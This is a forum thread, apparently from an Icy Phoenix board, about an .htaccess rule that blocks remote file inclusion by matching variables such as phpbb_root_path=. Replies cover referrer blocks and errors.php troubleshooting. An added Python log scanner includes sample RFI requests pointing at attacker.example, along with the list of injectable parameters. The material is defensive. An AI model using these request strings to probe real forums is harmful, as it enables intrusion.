058-008 & 009 - HTACCESS & Errors


Subject: 058-008 & 009 - HTACCESS & Errors
Hi all.

For all that cannot set REGISTER_GLOBALS to OFF, I've created this HTACCESS that may block hacking via RFI (Remote File Injection).

HTACCESS modification requires Apache Rewrite Engine set to ENABLED to work and is not needed for those who have REGISTER_GLOBALS set to OFF.

Here is the part to insert in your HTACCESS in the root of your site:

##################################
# Block Hacking Attempts - BEGIN #
##################################
##################################
# CONDITIONS
##################################
# STRICT CONDITION
#RewriteCond %{QUERY_STRING} ^.*(phpbb_root_path|album_root_path|module_root_path|mx_root_path|upi2db_file_path).*$
# LESS STRICT CONDITION
RewriteCond %{QUERY_STRING} ^.*(phpbb_root_path=|album_root_path=|module_root_path=|mx_root_path=|upi2db_file_path=).*$
##################################
# REWRITE
##################################
# FORBIDDEN
#RewriteRule ^.*$ - [F,L]
# REDIRECT TO LOCALHOST
RewriteRule ^.*$ http://127.0.0.1/ [redirect,last]
##################################
##################################
# Block Hacking Attempts - END #
##################################


This will redirect all hacking attempts using the most common known vars (these should be the only ones used in XS; if you install other mods, you may want to add other vars as well) to the hacker's own localhost.

I left commented out the option to generate an error that will be logged by the XS errors function, for which I attach the new file here.

So here attached you will find:
  • Premodified standard XS HTACCESS
  • New ERRORS.PHP file (replace the old with this one)


The file errors.php is independent from the HTACCESS, so you should apply this patch even if you are not modifying your HTACCESS.


Attachments:
  • 058_009_errors.zip (058-009 - Errors, 2.35 KB)
  • 058_008_htaccess.zip (058-008 - HTACCESS, 5.21 KB)
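As an added example (not from the post or the Icy Phoenix files): a small Python script that reproduces both RewriteCond variants from the snippet above and runs them over constructed Apache combined-format access-log lines, so a forum admin can see which requests the rule would catch and how the STRICT and LESS STRICT conditions differ. The log lines, IPs and hostnames are made up for the example.

```python
import re
from collections import Counter

# The alternations from the post's .htaccess: the STRICT condition flags the bare
# variable name anywhere in the query string; the LESS STRICT one needs "name=".
RFI_VARS = ("phpbb_root_path", "album_root_path", "module_root_path",
            "mx_root_path", "upi2db_file_path")
STRICT_RE = re.compile("|".join(re.escape(v) for v in RFI_VARS))
LESS_STRICT_RE = re.compile("|".join(re.escape(v) + "=" for v in RFI_VARS))

def matches_rfi_condition(query_string, strict=False):
    """Emulate the RewriteCond on a raw query string (^.*(...).*$ is just a search)."""
    pattern = STRICT_RE if strict else LESS_STRICT_RE
    return pattern.search(query_string) is not None

# Apache "combined" log format; the part of the request target after '?' is what
# %{QUERY_STRING} contains when the RewriteCond is evaluated.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*"$')

def scan_access_log(lines, strict=False):
    """Return {client_ip: number of requests the chosen RewriteCond would have caught}."""
    hits = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # skip malformed lines rather than crash
        _, _, query = m.group("target").partition("?")
        if query and matches_rfi_condition(query, strict):
            hits[m.group("ip")] += 1
    return dict(hits)

# Constructed sample lines (not real traffic). 203.0.113.5 sends two RFI-style requests,
# which the redirect rule answered with 302; 198.51.100.7 only searched for the word.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2006:13:55:36 +0000] "GET /forum/index.php?phpbb_root_path=http://attacker.example/ HTTP/1.1" 302 212 "-" "libwww-perl/5.805"',
    '198.51.100.7 - - [10/Oct/2006:13:56:01 +0000] "GET /forum/viewtopic.php?t=123&start=0 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2006:13:57:10 +0000] "GET /forum/search.php?search_keywords=phpbb_root_path HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2006:13:58:44 +0000] "GET /forum/album.php?album_root_path=http://attacker.example/ HTTP/1.1" 302 212 "-" "libwww-perl/5.805"',
    'garbage line that is not in combined format',
]

if __name__ == "__main__":
    for label, strict in (("less strict", False), ("strict", True)):
        print(label, scan_access_log(SAMPLE_LOG, strict))
```

The third sample line shows the trade-off the post leaves to you: the STRICT condition also hits an ordinary search for the string "phpbb_root_path", while the LESS STRICT one only fires when the name is used as a parameter.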

Subject: Re: 058-008 & 009 - HTACCESS & Errors
you've put my part in that .htaccess :mrg:

BTW..
is there a site you can redirect them to..
which will let them crash or something
was thinking to redirect them to my own site
then they'll find the .htaccess again
redirect again

bringing them into a loop
which makes them useless..

is there a site like that? :mrg:

Subject: Re: 058-008 & 009 - HTACCESS & Errors
I have set REGISTER_GLOBALS to OFF. I don't need to change the .htaccess file ... I can leave original .htaccess !

But I must change the errors file.

Is it all right?

Subject: Re: 058-008 & 009 - HTACCESS & Errors
In phpbb-seo they have suggested to me to make these changes in .htaccess

1)

Move
#make sure the whole site goes to www.mysite.com
#instead of mysite.com. This is good for the search engines
#Edit and uncomment the below lines for your own site.
RewriteCond %{HTTP_HOST} ^mysite\.com
RewriteRule (.*) http://www.mysite.com/$1 [R=301,L]


between

RewriteEngine On

and

RewriteBase /


2)

put [L] at the end of every RewriteRule

More details about this discussion you can find HERE

What do you think about it ?

Subject: Re: 058-008 & 009 - HTACCESS & Errors
Nizzle wrote:
you've put my part in that .htaccess :mrg:

BTW..
is there a site you can redirect them to..
which will let them crash or something
was thinking to redirect them to my own site
then they'll find the .htaccess again
redirect again

bringing them into a loop
which makes them useless..

is there a site like that? :mrg:

Great idea... we can buy a domain and do it! Then we will sell banners... :lol_flag:

Lucky wrote:
I have set REGISTER_GLOBALS to OFF. I don't need to change the .htaccess file ... I can leave original .htaccess !

But I must change the errors file.

Is it all right?

Right! :wink:

Lucky wrote:
In phpbb-seo they have suggested to me to make these changes in .htaccess

...

What do you think about it ?

Yes it does make sense... :wink:

Subject: Re: 058-008 & 009 - HTACCESS & Errors
got a new spammer site thingy..

1awm.com

Subject: Re: 058-008 & 009 - HTACCESS & Errors
this is ok for Aruba??...

Subject: Re: 058-008 & 009 - HTACCESS & Errors
hpl wrote:
this is ok for Aruba??...

Yes... it is working here.

Subject: Re: 058-008 & 009 - HTACCESS & Errors
today I've found yet some others..

RewriteCond %{HTTP_REFERER} ^(.*)alcotour.com(.*)$ [OR]
RewriteCond %{HTTP_REFERER} ^(.*)goldadornment.com(.*)$ [OR]
RewriteCond %{HTTP_REFERER} ^(.*)mifec.org(.*)$ [OR]
RewriteCond %{HTTP_REFERER} ^(.*)1awm.com(.*)$ [OR]
RewriteCond %{HTTP_REFERER} ^(.*)toruc.org(.*)$ [OR]


all from the same damn site

Subject: Re: 058-008 & 009 - HTACCESS & Errors
My error log:

script '/home/cosenzau/cosenzaunited.org/html/errors.php' not found or unable to stat, referer: http://www.cosenzaunited.org/forum/...=quote&p=490842

and more of this.

Subject: Re: 058-008 & 009 - HTACCESS & Errors
fracs wrote:
My error log:

script '/home/cosenzau/cosenzaunited.org/html/errors.php' not found or unable to stat, referer: http://www.cosenzaunited.org/forum/...=quote&p=490842

and more of this.

It seems you are missing that file... or you may have to set a different path to errors.php... :roll:

Do you have your forum in a subfolder?

Subject: Re: 058-008 & 009 - HTACCESS & Errors
error.php is in root of forum /forum/error.php, /html/ is root of the site...

0: [client 66.249.65.xxx] PHP Fatal error: Call to undefined function: session_pagestart() in /home/cosenzau/cosenzaunited.org/html/errors.php on line 49
1: [client 66.249.65.xxx] PHP Warning: main(): Failed opening './common.' for inclusion (include_path='.:/usr/share/pear') in /home/cosenzau/cosenzaunited.org/html/errors.php on line 24
2: [client 66.249.65.xxx] PHP Warning: main(./common.): failed to open stream: No such file or directory in /home/cosenzau/cosenzaunited.org/html/errors.php on line 24
3: [client 66.249.65.xxx] PHP Notice: Undefined variable: phpEx in /home/cosenzau/cosenzaunited.org/html/errors.php on line 24
4: [client 66.249.65.xxx] PHP Warning: main(): Failed opening './extension.inc' for inclusion (include_path='.:/usr/share/pear') in /home/cosenzau/cosenzaunited.org/html/errors.php on line 23
5: [client 66.249.65.xxx] PHP Warning: main(./extension.inc): failed to open stream: No such file or directory in /home/cosenzau/cosenzaunited.org/html/errors.php on line 23

Subject: Re: 058-008 & 009 - HTACCESS & Errors
Mighty Gorgon wrote:
Nizzle wrote:
you've put my part in that .htaccess :mrg:

BTW..
is there a site you can redirect them to..
which will let them crash or something
was thinking to redirect them to my own site
then they'll find the .htaccess again
redirect again

bringing them into a loop
which makes them useless..

is there a site like that? :mrg:

Great idea... we can buy a domain and do it! Then we will sell banners... :lol_flag:


you'd get a shitload of visitors :mrg:
put it in the default .htaccess for XS and you'll get even more :mro:


Powered by Icy Phoenix based on phpBB